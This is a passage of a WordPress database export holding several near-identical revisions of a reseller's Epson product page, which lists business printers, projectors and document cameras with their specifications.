eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /><br>\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.\n<ul>\n 	<li>White and Colour Brightness at 8,000lm</li>\n 	<li>WUXGA (1920 x 1200)</li>\n 	<li>Edge-blending to create large panoramic images</li>\n 	<li>Curve and corner wall projection</li>\n 	<li>HDBaseT</li>\n</ul>\n[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /><br>\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\n<ul>\n 	<li>White and Colour Brightness at 10,000Â lm</li>\n 	<li>WUXGA resolution</li>\n 	<li>High Reliability and Durability</li>\n 	<li>Suitable for 24/7 usage</li>\n 	<li>Flexible projection angles and installations</li>\n</ul>\n[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 11:07:00','2019-09-26 03:07:00','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3500,1,'2019-09-26 11:08:28','2019-09-26 03:08:28','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /><br>\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.\n<ul>\n 	<li>White and Colour Brightness at 8,000lm</li>\n 	<li>WUXGA (1920 x 1200)</li>\n 	<li>Edge-blending to create large panoramic images</li>\n 	<li>Curve and corner wall projection</li>\n 	<li>HDBaseT</li>\n</ul>\n[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /><br>\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\n<ul>\n 	<li>White and Colour Brightness at 10,000Â lm</li>\n 	<li>WUXGA resolution</li>\n 	<li>High Reliability and Durability</li>\n 	<li>Suitable for 24/7 usage</li>\n 	<li>Flexible projection angles and installations</li>\n</ul>\n[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 11:08:28','2019-09-26 03:08:28','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3501,1,'2019-09-26 11:09:05','2019-09-26 03:09:05','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, 